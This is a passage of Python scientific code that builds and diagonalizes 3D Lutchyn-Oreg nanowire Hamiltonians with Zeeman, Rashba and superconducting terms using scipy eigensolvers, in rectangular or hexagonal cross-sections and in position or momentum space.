                H_add[diagonal(m,k=1,step=2)] += -1j*aRz*k_vec[i]
                H_add[diagonal(m,k=-1,step=2)] += 1j*aRz*k_vec[i]
                if np.isscalar(section) and section=='rectangular':
                    E[:,i],U[:,:,i] = scipy.linalg.eigh(H+H_add, lower=False)
                    E[:,i],U[:,:,i]=order_eig(E[:,i],U[:,:,i],sparse='no',BdG='no')
                else:
                    H_k=H_rec2shape(H+H_add,section,N,dis,BdG='no',output='H',m=m_hex)
                    #Bug fix: this dense branch called scipy.linalg.eigsh,
                    #which does not exist (eigsh is the sparse solver in
                    #scipy.sparse.linalg); the dense Hermitian solver is
                    #eigh, as used in the rectangular branch above.
                    E[:,i], U_hex = scipy.linalg.eigh(H_k, lower=False)
                    E[:,i],U_hex=order_eig(E[:,i],U_hex,sparse='no',BdG='no')
                    U[:,:,i]=U_shape2rec(U_hex,section,N,dis,BdG='no')
                #Undo the kx-dependent terms before the next momentum point:
                H_add[diagonal(m)] -= np.repeat(cons.hbar**2/(2*m_eff*cons.m_e*(1e-9)**2)/cons.e*1e3*k_vec[i]**2,2)
                H_add[diagonal(m)] -= -1*aRy*k_vec[i]
                H_add[diagonal(m,k=1,step=2)] -= -1j*aRz*k_vec[i]
                H_add[diagonal(m,k=-1,step=2)] -= 1j*aRz*k_vec[i]
    else:
        if space=='position':
            if np.isscalar(section) and section=='rectangular':
                if not(near is None):
                    E, U = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H+H_add),k = n_eig, which='LA',sigma=near,tol=1e-9)
                else:
                    E, U = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H+H_add),k = n_eig, which='SA',tol=1e-9)
                E,U=order_eig(E,U,sparse='yes',BdG='no')
            else:
                H=H_rec2shape(H+H_add,section,N,dis,BdG='no',output='H',m=m_hex)
                if not(near is None):
                    E, U_hex = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H),k = n_eig, which='LA',sigma=near,tol=1e-9)
                else:
                    E, U_hex = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H),k = n_eig, which='SA',tol=1e-9)
                E,U_hex=order_eig(E,U_hex,sparse='yes',BdG='no')
                U=U_shape2rec(U_hex,section,N,dis,BdG='no')
        elif space=='momentum':
            H_k= scipy.sparse.dok_matrix((m,m),dtype=complex)
            aRy, aRz = aRy.flatten(), aRz.flatten()
            aRy=np.repeat(aRy,2)
            aRy[1::2] = -aRy[::2]
            for i in range(n_k):
                #(Removed a leftover debug print(i) here.)
                H_k = (H+H_add).copy()
                #Add the kx-dependent terms for this momentum point:
                H_k[diagonal(m)] += np.repeat(cons.hbar**2/(2*m_eff*cons.m_e*(1e-9)**2)/cons.e*1e3*k_vec[i]**2,2)
                H_k[diagonal(m)] += -1*aRy*k_vec[i]
                H_k[diagonal(m,k=1,step=2)] += -1j*aRz*k_vec[i]
                H_k[diagonal(m,k=-1,step=2)] += 1j*aRz*k_vec[i]
                if np.isscalar(section) and section=='rectangular':
                    E[:,i], U[:,:,i] = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_k),k = n_eig, which='SA',tol=1e-5)
                    E[:,i], U[:,:,i]=order_eig(E[:,i], U[:,:,i],sparse='yes',BdG='no')
                else:
                    H_k=H_rec2shape(H_k,section,N,dis,BdG='no',output='H',m=m_hex)
                    if not(near is None):
                        E[:,i], U_hex = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_k),k = n_eig, which='LA',sigma=near,tol=1e-4)
                    else:
                        E[:,i], U_hex = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_k),k = n_eig, which='SA',tol=1e-4)
                    E[:,i],U_hex=order_eig(E[:,i],U_hex,sparse='yes',BdG='no')
                    U[:,:,i]=U_shape2rec(U_hex,section,N,dis,BdG='no')

    return (E), (U)
#%%
def LO_3D_solver(H,N,dis,
mu=0,B=0,aR=0,d=0,
space='position',k_vec=0,
sparse='yes',n_eig=None,near=None,
section='rectangular'):
"""
3D Lutchy-Oreg Hamiltonian solver. It solves the Hamiltoninan (built with
Lutchyn_builder) of a 3D Lutchy-Oreg chain with superconductivity.
Parameters
----------
H: arr
Discretized 3D Lutchyn-Oreg Hamiltonian built with Lutchyn_builder.
N: arr
Number of sites in each direction.
dis: int or int
Distance (in nm) between sites.
mu: float or arr
On-site chemical potential. If it is float, the chemical potential
is the same in every site, while if it is a 3D array, it is the
on-site chemical potential.
B: float or arr
Zeeman splitting.
-If B is a float, the same constant B is added in the x direction
in each site and in every diagonalization step.
-If B is a 1D array of length=3, each element of the array is the
(constant) Zeeman splitting in each direction, which is added in
every diagonalization step.
aR: float or arr
Rashba coupling.
-If aR is a float, the same constant aR is added in the z direction
in each site and in every diagonalization step.
-If aR is a 1D array of length=3, each element of the array is the
(constant) Rashba coupling in each direction, which is added in
every diagonalization step.
-If aR is a 3D array (3 x (N)), each element of the array aR[i] is
the Rashba coupling in each direction, whose matrix alements are
the on-site Rashba couplings.
d: float or arr
On-site superconductivity. If it is float, the SC pairign amplitude
is the same in every site, while if it is a 3D array, it is the
on-site superconductivity.
dic: numpy array
Whether to re-use the dictionary of sites of other process or not.
space: {"position","momentum","position2momentum"}
Space in which the Hamiltonian is built. "position" means
real-space (r-space). In this case the boundary conditions are open.
On the other hand, "momentum" means reciprocal space (k-space). In
this case the built Hamiltonian corresponds to the Hamiltonian of
the unit cell, with periodic boundary conditions along the
x-direction. "position2momentum" means that the Hamiltonian is
built in real space, but you want to diagonalize it in momentum
space (so in each step is converted to a momentum space).This
option is recommended for large matrices.
k_vec: arr
If space=='momentum' or "position2momentum", k_vec is the
(discretized) momentum vector, usually in the First Brillouin Zone.
sparse: {"yes","no"}
Sparsety of the built Hamiltonian. "yes" builds a dok_sparse matrix,
while "no" builds a dense matrix.
n_eig: int
If sparse=="yes", n_eig is the number of eigenvalues you want to
obtain. If BdG=='yes', these eigenvalues are obtained around zero
energy, whil if BdG=='no' these eigenvalues correspond to the
lowest-energy eigenstates. This can be changed with the near option.
near: float
If sparse=="yes" and BdG=='no', near provides the value around to
which the eigenvalues must be found.
section: {"rectangular","hexagonal"}
Whether the system have a rectangular or hexagonal cross-section
in the plane zy.
Rashba={"Full-Rashba","kx-terms"}
Whether include all the terms of the Rashba coupling (Full-Rashba)
or include only those terms proportional to kx (kx-terms).
Returns
-------
E: arr (n_eig x n)
Eigevalues (energies), ordered from smaller to larger.
U: arr ((2 x N) x n_eig x n)
Eigenvectors of the system with the same ordering.
"""
#Obtain dimensions:
Nx, Ny, Nz = N[0], N[1], N[2]
if np.ndim(dis)==0:
dis_x, dis_y, dis_z = dis, dis, dis
else:
dis_x, dis_y, dis_z = dis[0], dis[1], dis[2]
m = int(4 * Nx * Ny * Nz)
if (np.isscalar(section) and not(section=='rectangular')) or not(np.isscalar(section)):
m_hex=H_rec2shape(0,section,N,dis,BdG='yes',output='m')
if (space=='momentum'):
n_k=len(k_vec)
if sparse=='no':
n_eig=m
#Make sure that the onsite parameters are arrays:
if np.isscalar(mu) and not(mu==0):
mu = mu * np.ones((Nx,Ny,Nz))
if np.isscalar(B) and not(B==0):
Bx=B
By=0
Bz=0
Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)
elif np.ndim(B)==1 and len(B)==3:
Bx=B[0]
By=B[1]
Bz=B[2]
Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)
if np.ndim(aR)==0:
aRx=np.zeros((Nx,Ny,Nz))
aRy=np.zeros((Nx,Ny,Nz))
aRz=aR*np.ones((Nx,Ny,Nz))
elif np.ndim(aR)==1:
if len(aR)==3:
aRx=aR[0]*np.ones((Nx,Ny,Nz))
aRy=aR[1]*np.ones((Nx,Ny,Nz))
aRz=aR[2]*np.ones((Nx,Ny,Nz))
else:
aRx=np.zeros((Nx,Ny,Nz))
aRy=np.zeros((Nx,Ny,Nz))
aRz=aR*np.ones((Nx,Ny,Nz))
else:
aRx=aR[0]
aRy=aR[1]
aRz=aR[2]
if np.isscalar(d) and not(d==0):
d = d * np.ones((Nx,Ny,Nz))
#Store matrices:
if space=='position':
E = np.empty([int(n_eig)])
U = np.empty([m,int(n_eig)],dtype=complex)
elif space=='momentum':
E = np.empty([int(n_eig),n_k])
U = np.empty([m,int(n_eig),n_k],dtype=complex)
if sparse=='no':
H_add=np.zeros((m,m),dtype=complex)
else:
if not(scipy.sparse.issparse(H)):
H = scipy.sparse.dok_matrix(H,dtype=complex)
H_add=scipy.sparse.dok_matrix((m,m),dtype=complex)
#Build the Hamiltonian:
if not(np.isscalar(mu)):
e=-mu
e=e.flatten()
for i in range(2):
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i)] = (-1)**(i)*np.repeat(e,2)
if not(np.isscalar(B) and B==0):
Bx,By,Bz=Bx.flatten(),By.flatten(),Bz.flatten()
Bz=np.repeat(Bz,2)
Bz[1::2] = -Bz[::2]
for i in range(2):
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=1,step=2)], H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=-1,step=2)] = (-1)**(i)*Bx-1j*By, (-1)**(i)*Bx+1j*By
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i)] = (-1)**(i)*Bz
if not((aRy==0).all() and (aRz==0).all()):
aRy_kx, aRz_kx = np.repeat(((aRy[1::,:,:]+aRy[:-1,:,:])/(4*dis_x)).flatten(),2), ((aRz[1::,:,:]+aRz[:-1,:,:])/(4*dis_x)).flatten()
aRx_ky, aRz_ky = np.repeat(((aRx[:,1::,:]+aRx[:,:-1,:])/(4*dis_y)).flatten(),2), ((aRz[:,1::,:]+aRz[:,:-1,:])/(4*dis_y)).flatten()
aRx_kz, aRy_kz = ((aRx[:,:,1::]+aRx[:,:,:-1])/(4*dis_z)).flatten(), ((aRy[:,:,1::]+aRy[:,:,:-1])/(4*dis_z)).flatten()
aRy_kx[1::2], aRx_ky[1::2] = -aRy_kx[::2], -aRx_ky[::2]
aRx_ky, aRz_ky = np.insert(aRx_ky,np.repeat(np.arange(2*(Nz*Ny-Nz),2*(Ny*Nz-Nz)*Nx,2*(Ny*Nz-Nz)),2*Nz),np.zeros(2*Nz*(Nx-1))),np.insert(aRz_ky,np.repeat(np.arange((Nz*Ny-Nz),(Ny*Nz-Nz)*Nx,(Ny*Nz-Nz)),Nz),np.zeros(Nz*(Nx-1)))
aRx_kz, aRy_kz = np.insert(aRx_kz,np.arange((Nz-1),(Nz-1)*Ny*Nx,(Nz-1)),np.zeros(Nx*(Ny-1)+(Nx-1))), np.insert(aRy_kz,np.arange((Nz-1),(Nz-1)*Ny*Nx,(Nz-1)),np.zeros(Nx*(Ny-1)+(Nx-1)))
for i in range(2):
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=2*Ny*Nz)] = -1j*aRy_kx
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=-2*Ny*Nz)] = +1j*aRy_kx
H_add[diagonal(int(m/2)*(i+1),k=2*Ny*Nz-1,step=2,init=1+int(m/2)*i)] += -1*(-1)**(i)*aRz_kx
H_add[diagonal(int(m/2)*(i+1),k=-2*Ny*Nz+1,step=2,init=1+int(m/2)*i)] += -1*(-1)**(i)*aRz_kx
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=1+2*Ny*Nz,step=2)] += (-1)**(i)*aRz_kx
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=-1-2*Ny*Nz,step=2)] += (-1)**(i)*aRz_kx
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=2*Nz)] = +1j*aRx_ky
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=-2*Nz)] = -1j*aRx_ky
H_add[diagonal(int(m/2)*(i+1),k=2*Nz-1,step=2,init=1+int(m/2)*i)] += -1j*aRz_ky
H_add[diagonal(int(m/2)*(i+1),k=-2*Nz+1,step=2,init=1+int(m/2)*i)] += 1j*aRz_ky
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=1+2*Nz,step=2)] += -1j*aRz_ky
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=-1-2*Nz,step=2)] += 1j*aRz_ky
H_add[diagonal(int(m/2)*(i+1),k=1,step=2,init=1+int(m/2)*i)] += (-1)**(i)*aRx_kz+1j*aRy_kz
H_add[diagonal(int(m/2)*(i+1),k=-1,step=2,init=1+int(m/2)*i)] += (-1)**(i)*aRx_kz-1j*aRy_kz
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=3,step=2)] += -1*(-1)**(i)*aRx_kz+1j*aRy_kz
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=-3,step=2)] += -1*(-1)**(i)*aRx_kz-1j*aRy_kz
if not(np.isscalar(d)):
d=d.flatten()
H_add[diagonal(m,k=int(m/2)+1,step=2)], H_add[diagonal(m,k=-int(m/2)-1,step=2)] = -np.conj(d), -d
H_add[diagonal(m,k=int(m/2)-1,step=2,init=1)], H_add[diagonal(m,k=-int(m/2)+1,step=2,init=1)] = np.conj(d), d
#Diagonalize the Hamiltonian:
if sparse=='no':
######### revisar
if space=='position':
E[0:int(m/2)], U[0:m, 0:int(m/2)] = scipy.linalg.eigh(H+H_add, lower=False,eigvals=(2*N,4*N-1))
E[int(m/2):m]=-E[0:int(m/2)]
U[0:int(m/2), int(m/2):m] = U[int(m/2):m, 0:int(m/2)]
U[int(m/2):m, int(m/2):m] = U[0:int(m/2), 0:int(m/2)]
E,U=order_eig(E,U,sparse='no')
elif space=='momentum':
for i in range(n_k):
for j in range(2):
H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=m-2*Ny*Nz)] = (-1j*aRy_kx)*np.exp(-1j*k_vec[i]*Nx*(-1)**(i))
H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=-m+2*Ny*Nz)] = (+1j*aRy_kx)*np.exp(1j*k_vec[i]*Nx*(-1)**(i))
H_add[diagonal(int(m/2)*(j+1),k=m-2*Ny*Nz-1,step=2,init=1+int(m/2)*j)] = (-1)**(i)*(-aRz_kx)*np.exp(-1j*(-1)**(i)*k_vec[i]*Nx*(-1)**(i))
H_add[diagonal(int(m/2)*(j+1),k=-m+2*Ny*Nz+1,step=2,init=1+int(m/2)*j)] = (-1)**(i)*(-aRz_kx)*np.exp(1j*(-1)**(i)*k_vec[i]*Nx*(-1)**(i))
H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=m+1-2*Ny*Nz,step=2)] = (-1)**(i)*(aRz_kx)*np.exp(-1j*(-1)**(i)*k_vec[i]*Nx*(-1)**(i))
H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=-m-1+2*Ny*Nz,step=2)] = (-1)**(i)*(aRz_kx)*np.exp(1j*(-1)**(i)*k_vec[i]*Nx*(-1)**(i))
E[0:int(m/2),i], U[0:m, 0:int(m/2),i] = scipy.linalg.eigh(H[:,:,i]+H_add, lower=False,eigvals=(2*N,4*N-1))
E[int(m/2):m,i]=-E[0:int(m/2),i]
U[0:int(m/2), int(m/2):m,i] = U[int(m/2):m, 0:int(m/2),i]
U[int(m/2):m, int(m/2):m,i] = U[0:int(m/2), 0:int(m/2),i]
E[:,i],U[:,:,i]=order_eig(E[:,i],U[:,:,i],sparse='no')
#########
else:
if space=='position':
if np.isscalar(section) and section=='rectangular':
E, U = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H+H_add),k = n_eig,sigma=0, which='LM',tol=1e-4)
E, U=order_eig(E, U,sparse='yes')
else:
H=H_rec2shape(H+H_add,section,N,dis,BdG='yes',output='H',m=m_hex)
E, U_hex = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H),k = n_eig,sigma=0, which='LM',tol=1e-4)
E, U_hex=order_eig(E, U_hex,sparse='yes')
U=U_shape2rec(U_hex,section,N,dis,BdG='yes')
elif space=='momentum':
H_k= scipy.sparse.dok_matrix((m,m),dtype=complex)
for i in range(n_k):
H_k = (H+H_add).copy()
for j in range(2):
if not((aRy==0).all()):
H_k[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=m-2*Ny*Nz)] = (-1j*aRy_kx)*np.exp(-1j*k_vec[i]*Nx*(-1)**(i))
H_k[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=-m+2*Ny*Nz)] = (+1j*aRy_kx)*np.exp(1j*k_vec[i]*Nx*(-1)**(i))
if not((aRz==0).all()):
H_k[diagonal(int(m/2)*(j+1),k=m-2*Ny*Nz-1,step=2,init=1+int(m/2)*j)] = (-1)**(i)*(-aRz_kx)*np.exp(-1j*(-1)**(i)*k_vec[i]*Nx*(-1)**(i))
H_k[diagonal(int(m/2)*(j+1),k=-m+2*Ny*Nz+1,step=2,init=1+int(m/2)*j)] = (-1)**(i)*(-aRz_kx)*np.exp(1j*(-1)**(i)*k_vec[i]*Nx*(-1)**(i))
H_k[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=m+1-2*Ny*Nz,step=2)] = (-1)**(i)*(aRz_kx)*np.exp(-1j*(-1)**(i)*k_vec[i]*Nx*(-1)**(i))
H_k[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=-m-1+2*Ny*Nz,step=2)] = (-1)**(i)*(aRz_kx)*np.exp(1j*(-1)**(i)*k_vec[i]*Nx*(-1)**(i))
if np.isscalar(section) and section=='rectangular':
E[:,i], U[:,:,i] = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_k),k = n_eig,sigma=0, which='LM',tol=1e-5)
E[:,i], U[:,:,i]=order_eig(E[:,i], U[:,:,i],sparse='yes')
else:
H_k=H_rec2shape(H_k,section,N,dis,BdG='yes',output='H',m=m_hex)
E[:,i], U_hex = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_k),k = n_eig,sigma=0, which='LM',tol=1e-5)
E[:,i], U_hex =order_eig(E[:,i], U_hex,sparse='yes')
U[:,:,i]=U_shape2rec(U_hex,section,N,dis,BdG='yes')
return (E), (U)
#%%
def LO_3D_solver_NoSC(H,N,dis,
mu=0,B=0,aR=0,
space='position',k_vec=0,
sparse='yes',n_eig=None,near=None,
section='rectangular'):
"""
3D Lutchy-Oreg Hamiltonian solver. It solves the Hamiltoninan (built with
Lutchyn_builder) of a 3D Lutchy-Oreg chain withot superconductivity.
Parameters
----------
H: arr
Discretized 3D Lutchyn-Oreg Hamiltonian built with Lutchyn_builder.
N: arr
Number of sites in each direction.
dis: int or int
Distance (in nm) between sites.
mu: float or arr
On-site chemical potential. If it is float, the chemical potential
is the same in every site, while if it is a 3D array, it is the
on-site chemical potential.
B: float or arr
Zeeman splitting.
-If B is a float, the same constant B is added in the x direction
in each site and in every diagonalization step.
-If B is a 1D array of length=3, each element of the array is the
(constant) Zeeman splitting in each direction, which is added in
every diagonalization step.
aR: float or arr
Rashba coupling.
-If aR is a float, the same constant aR is added in the z direction
in each site and in every diagonalization step.
-If aR is a 1D array of length=3, each element of the array is the
(constant) Rashba coupling in each direction, which is added in
every diagonalization step.
-If aR is a 3D array (3 x (N)), each element of the array aR[i] is
the Rashba coupling in each direction, whose matrix alements are
the on-site Rashba couplings.
dic: numpy array
Whether to re-use the dictionary of sites of other process or not.
space: {"position","momentum","position2momentum"}
Space in which the Hamiltonian is built. "position" means
real-space (r-space). In this case the boundary conditions are open.
On the other hand, "momentum" means reciprocal space (k-space). In
this case the built Hamiltonian corresponds to the Hamiltonian of
the unit cell, with periodic boundary conditions along the
x-direction. "position2momentum" means that the Hamiltonian is
built in real space, but you want to diagonalize it in momentum
space (so in each step is converted to a momentum space).This
option is recommended for large matrices.
k_vec: arr
If space=='momentum' or "position2momentum", k_vec is the
(discretized) momentum vector, usually in the First Brillouin Zone.
sparse: {"yes","no"}
Sparsety of the built Hamiltonian. "yes" builds a dok_sparse matrix,
while "no" builds a dense matrix.
n_eig: int
If sparse=="yes", n_eig is the number of eigenvalues you want to
obtain. If BdG=='yes', these eigenvalues are obtained around zero
energy, whil if BdG=='no' these eigenvalues correspond to the
lowest-energy eigenstates. This can be changed with the near option.
near: float
If sparse=="yes" and BdG=='no', near provides the value around to
which the eigenvalues must be found.
section: {"rectangular","hexagonal"}
Whether the system have a rectangular or hexagonal cross-section
in the plane zy.
Rashba={"Full-Rashba","kx-terms"}
Whether include all the terms of the Rashba coupling (Full-Rashba)
or include only those terms proportional to kx (kx-terms).
Returns
-------
E: arr (n_eig x n)
Eigevalues (energies), ordered from smaller to larger.
U: arr ((2 x N) x n_eig x n)
Eigenvectors of the system with the same ordering.
"""
#Obtain dimensions:
Nx, Ny, Nz = N[0], N[1], N[2]
if np.ndim(dis)==0:
dis_x, dis_y, dis_z = dis, dis, dis
else:
dis_x, dis_y, dis_z = dis[0], dis[1], dis[2]
m = int(2 * Nx * Ny * Nz)
if (np.isscalar(section) and not(section=='rectangular')) or not(np.isscalar(section)):
m_hex=H_rec2shape(0,section,N,dis,BdG='no',output='m')
if (space=='momentum'):
n_k=len(k_vec)
if sparse=='no':
n_eig=m
#Make sure that the onsite parameters are arrays:
if np.isscalar(mu) and not(mu==0):
mu = mu * np.ones((Nx,Ny,Nz))
if np.isscalar(B) and not(B==0):
Bx=B
By=0
Bz=0
Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)
elif np.ndim(B)==1 and len(B)==3:
Bx=B[0]
By=B[1]
Bz=B[2]
Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)
if np.ndim(aR)==0:
aRx=np.zeros((Nx,Ny,Nz))
aRy=np.zeros((Nx,Ny,Nz))
aRz=aR*np.ones((Nx,Ny,Nz))
elif np.ndim(aR)==1:
if len(aR)==3:
aRx=aR[0]*np.ones((Nx,Ny,Nz))
aRy=aR[1]*np.ones((Nx,Ny,Nz))
aRz=aR[2]*np.ones((Nx,Ny,Nz))
else:
aRx=np.zeros((Nx,Ny,Nz))
aRy=np.zeros((Nx,Ny,Nz))
aRz=aR*np.ones((Nx,Ny,Nz))
else:
aRx=aR[0]
aRy=aR[1]
aRz=aR[2]
#Store matrices:
if space=='position':
E = np.empty([int(n_eig)])
U = np.empty([m,int(n_eig)],dtype=complex)
elif space=='momentum':
E = np.empty([int(n_eig),n_k])
U = np.empty([m,int(n_eig),n_k],dtype=complex)
if sparse=='no':
H_add=np.zeros((m,m),dtype=complex)
else:
if not(scipy.sparse.issparse(H)):
H = scipy.sparse.dok_matrix(H,dtype=complex)
H_add=scipy.sparse.dok_matrix((m,m),dtype=complex)
#Build the Hamiltonian:
if not(np.isscalar(mu)):
e=-mu
e=e.flatten()
H_add[diagonal(m)] = np.repeat(e,2)
if not(np.isscalar(B) and B==0):
Bx,By,Bz=Bx.flatten(),By.flatten(),Bz.flatten()
Bz=np.repeat(Bz,2)
Bz[1::2] = -Bz[::2]
H_add[diagonal(m,k=1,step=2)], H_add[diagonal(m,k=-1,step=2)] = Bx-1j*By, Bx+1j*By
H_add[diagonal(m)] = + Bz
if not((aRx==0).all() and (aRy==0).all() and (aRz==0).all()):
aRy_kx, aRz_kx = np.repeat(((aRy[1::,:,:]+aRy[:-1,:,:])/(4*dis_x)).flatten(),2), ((aRz[1::,:,:]+aRz[:-1,:,:])/(4*dis_x)).flatten()
aRx_ky, aRz_ky = np.repeat(((aRx[:,1::,:]+aRx[:,:-1,:])/(4*dis_y)).flatten(),2), ((aRz[:,1::,:]+aRz[:,:-1,:])/(4*dis_y)).flatten()
aRx_kz, aRy_kz = ((aRx[:,:,1::]+aRx[:,:,:-1])/(4*dis_z)).flatten(), ((aRy[:,:,1::]+aRy[:,:,:-1])/(4*dis_z)).flatten()
aRy_kx[1::2], aRx_ky[1::2] = -aRy_kx[::2], -aRx_ky[::2]
H_add[diagonal(m,k=2*Ny*Nz)] = -1j*aRy_kx
H_add[diagonal(m,k=-2*Ny*Nz)] = +1j*aRy_kx
H_add[diagonal(m,k=2*Ny*Nz-1,step=2,init=1)] += -aRz_kx
H_add[diagonal(m,k=-2*Ny*Nz+1,step=2,init=1)] += -aRz_kx
H_add[diagonal(m,k=1+2*Ny*Nz,step=2)] += aRz_kx
H_add[diagonal(m,k=-1-2*Ny*Nz,step=2)] += aRz_kx
aRx_ky, aRz_ky = np.insert(aRx_ky,np.repeat(np.arange(2*(Nz*Ny-Nz),2*(Ny*Nz-Nz)*Nx,2*(Ny*Nz-Nz)),2*Nz),np.zeros(2*Nz*(Nx-1))),np.insert(aRz_ky,np.repeat(np.arange((Nz*Ny-Nz),(Ny*Nz-Nz)*Nx,(Ny*Nz-Nz)),Nz),np.zeros(Nz*(Nx-1)))
H_add[diagonal(m,k=2*Nz)] = +1j*aRx_ky
H_add[diagonal(m,k=-2*Nz)] = -1j*aRx_ky
H_add[diagonal(m,k=2*Nz-1,step=2,init=1)] += -1j*aRz_ky
H_add[diagonal(m,k=-2*Nz+1,step=2,init=1)] += 1j*aRz_ky
H_add[diagonal(m,k=1+2*Nz,step=2)] += -1j*aRz_ky
H_add[diagonal(m,k=-1-2*Nz,step=2)] += 1j*aRz_ky
aRx_kz, aRy_kz = np.insert(aRx_kz,np.arange((Nz-1),(Nz-1)*Ny*Nx,(Nz-1)),np.zeros(Nx*(Ny-1)+(Nx-1))), np.insert(aRy_kz,np.arange((Nz-1),(Nz-1)*Ny*Nx,(Nz-1)),np.zeros(Nx*(Ny-1)+(Nx-1)))
H_add[diagonal(m,k=1,step=2,init=1)] += aRx_kz+1j*aRy_kz
H_add[diagonal(m,k=-1,step=2,init=1)] += aRx_kz-1j*aRy_kz
H_add[diagonal(m,k=3,step=2)] += -aRx_kz+1j*aRy_kz
H_add[diagonal(m,k=-3,step=2)] += -aRx_kz-1j*aRy_kz
#Diagonalize the Hamiltonian:
if sparse=='no':
###### revisar:
if space=='position':
E, U = scipy.linalg.eigh(H+H_add, lower=False)
E, U=order_eig(E, U,sparse='no')
elif space=='momentum':
for i in range(n_k):
H_add[diagonal(m,k=m-2*Ny*Nz)] = (-1j*aRy_kx)*np.exp(-1j*k_vec[i]*Nx)
H_add[diagonal(m,k=-m+2*Ny*Nz)] = (+1j*aRy_kx)*np.exp(1j*k_vec[i]*Nx)
H_add[diagonal(m,k=m-2*Ny*Nz-1,step=2,init=1)] = (-aRz_kx)*np.exp(-1j*k_vec[i]*Nx)
H_add[diagonal(m,k=-m+2*Ny*Nz+1,step=2,init=1)] = (-aRz_kx)*np.exp(1j*k_vec[i]*Nx)
H_add[diagonal(m,k=m+1-2*Ny*Nz,step=2)] = (aRz_kx)*np.exp(-1j*k_vec[i]*Nx)
H_add[diagonal(m,k=-m-1+2*Ny*Nz,step=2)] = (aRz_kx)*np.exp(1j*k_vec[i]*Nx)
E[:,i], U[:,:,i]= scipy.linalg.eigh(H[:,:,i]+H_add, lower=False)
E[:,i], U[:,:,i]=order_eig(E[:,i], U[:,:,i],sparse='no')
########
else:
if space=='position':
if np.isscalar(section) and section=='rectangular':
E, U = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H+H_add),k = n_eig, which='SA',tol=1e-5)
E, U=order_eig(E, U,sparse='yes',BdG='no')
else:
H=H_rec2shape(H+H_add,section,N,dis,BdG='no',output='H',m=m_hex)
E, U_hex = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H),k = n_eig, which='SA',tol=1e-5)
E, U_hex=order_eig(E, U_hex,sparse='yes',BdG='no')
U=U_shape2rec(U_hex,section,N,dis,BdG='no')
elif space=='momentum':
H_k= scipy.sparse.dok_matrix((m,m),dtype=complex)
for i in range(n_k):
H_k = (H+H_add).copy()
if not((aRy==0).all()):
H_k[diagonal(m,k=m-2*Ny*Nz)] = (-1j*aRy_kx)*np.exp(-1j*k_vec[i]*Nx)
H_k[diagonal(m,k=-m+2*Ny*Nz)] = (+1j*aRy_kx)*np.exp(1j*k_vec[i]*Nx)
if not((aRz==0).all()):
H_k[diagonal(m,k=m-2*Ny*Nz-1,step=2,init=1)] = (-aRz_kx)*np.exp(-1j*k_vec[i]*Nx)
H_k[diagonal(m,k=-m+2*Ny*Nz+1,step=2,init=1)] = (-aRz_kx)*np.exp(1j*k_vec[i]*Nx)
H_k[diagonal(m,k=m+1-2*Ny*Nz,step=2)] = (aRz_kx)*np.exp(-1j*k_vec[i]*Nx)
H_k[diagonal(m,k=-m-1+2*Ny*Nz,step=2)] = (aRz_kx)*np.exp(1j*k_vec[i]*Nx)
if np.isscalar(section) and section=='rectangular':
E[:,i], U[:,:,i] = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_k),k = n_eig, which='SA',tol=1e-5)
E[:,i], U[:,:,i]=order_eig(E[:,i], U[:,:,i],sparse='no',BdG='no')
else:
H_k=H_rec2shape(H_k,section,N,dis,BdG='no',output='H',m=m_hex)
E[:,i], U_hex = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_k),k = n_eig, which='SA',tol=1e-5)
E[:,i], U_hex =order_eig(E[:,i], U_hex,sparse='yes',BdG='no')
U[:,:,i]=U_shape2rec(U_hex,section,N,dis,BdG='no')
return (E), (U)
#%%
def LO_3D_solver_MO(H,N,dis,
n_eig,n_orb,Nxp=None,
mu=0,aR=0,d=0,
sparse='no',section='rectangular',BdG='yes'):
"""
3D Lutchy-Oreg Hamiltonian solver. It solves the Hamiltoninan (built with
Lutchyn_builder) of a 3D Lutchy-Oreg chain using the Benjamin D. Woods
mehtod.
Parameters
----------
H_2D: arr
A 1D array whose elements H_2D[i] are 2D arrays describing the
cross-section Hamiltonian at the position x[i] of the wire. This is
built with Lutchyn_builder.
H_3D: arr
The 3D Hamiltonian which includes the orbital-coupled terms. This
is built with Lutchyn_builder.
N: arr
Number of sites in each direction.
dis: int or int
